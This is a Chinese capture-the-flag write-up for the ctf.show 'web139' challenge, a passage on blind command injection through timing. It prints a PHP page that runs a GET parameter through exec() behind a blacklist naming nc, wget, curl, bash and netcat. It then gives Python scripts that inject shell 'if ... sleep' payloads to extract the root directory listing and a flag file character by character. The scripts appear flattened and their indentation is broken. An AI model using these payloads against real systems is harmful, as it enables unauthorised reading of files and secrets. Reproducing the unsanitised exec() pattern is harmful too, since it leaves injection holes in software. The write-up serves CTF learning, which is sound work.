web139笔记（过if和sleep来判断盲注）

<?php
error_reporting(0);
function check($x){if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){die('too young too simple sometimes naive!');}
}
if(isset($_GET['c'])){$c=$_GET['c'];check($c);exec($c);
}
else{highlight_file(__FILE__);
}
?>

web136 plus?

通过尝试之前的操作，发现再次访问时⻚⾯还是在当前⻚⾯，所以猜测⽆法写⼊⽂件了

这⾥涉及到了shell编程和盲注。其实就相当于盲注⽂件名字和⽂件内容

截取字符串可以⽤awk等命令，cut可以分割字符 判断命令执⾏结果可以⽤shell编程的if语句和sleep()函数

这⾥来实验⼀下，⾸先在当前⽬录写⼊⼀个flag.php

this is flag.php
your flag is:
flag{test_a_flag}

使⽤awk，再使⽤cut命令切割，然后通过if和sleep来判断，因此可以写出脚本。

cat flag.php |awk NR=3                                         cat flag.php | awk NR=3 | cut -c 1

flag{test_a_flag}                       f

 用命令ls \查看根目录来获取flag文件名，脚本如下

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/28 1:25
# blog: www.wlhhlc.top
import requests
url = "http://1bb8ea48-6413-47ef-94bb-8dd313c14c9e.chall.ctf.show:8080/"
result = ""
for i in range(1,5):for j in range(1,15):#ascii码表for k in range(32,128):k=chr(k)payload = "?c=" + f"if [ `ls / | awk NR=={i} | cut -c {j}` == {k} ];then sleep 2;fi"try:requests.get(url=url+payload, timeout=(1.5,1.5))except:result = result + kprint(result)breakresult += " "

 

发现一个文件名是f149_15_h3r3的文件，flag就在这里边，那就改一下脚本cat一下

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/28 1:25
# blog: www.wlhhlc.top
import requests
url = "http://1bb8ea48-6413-47ef-94bb-8dd313c14c9e.chall.ctf.show:8080/"
result = ""
for j in range(1,60):#ascii码表for k in range(32,128):k=chr(k)payload = "?c=" + f"if [ `cat /f149_15_h3r3 | cut -c {j}` == {k} ];then sleep 2;fi"try:requests.get(url=url+payload, timeout=(1.5,1.5))except:result = result + kprint(result)break
result += " "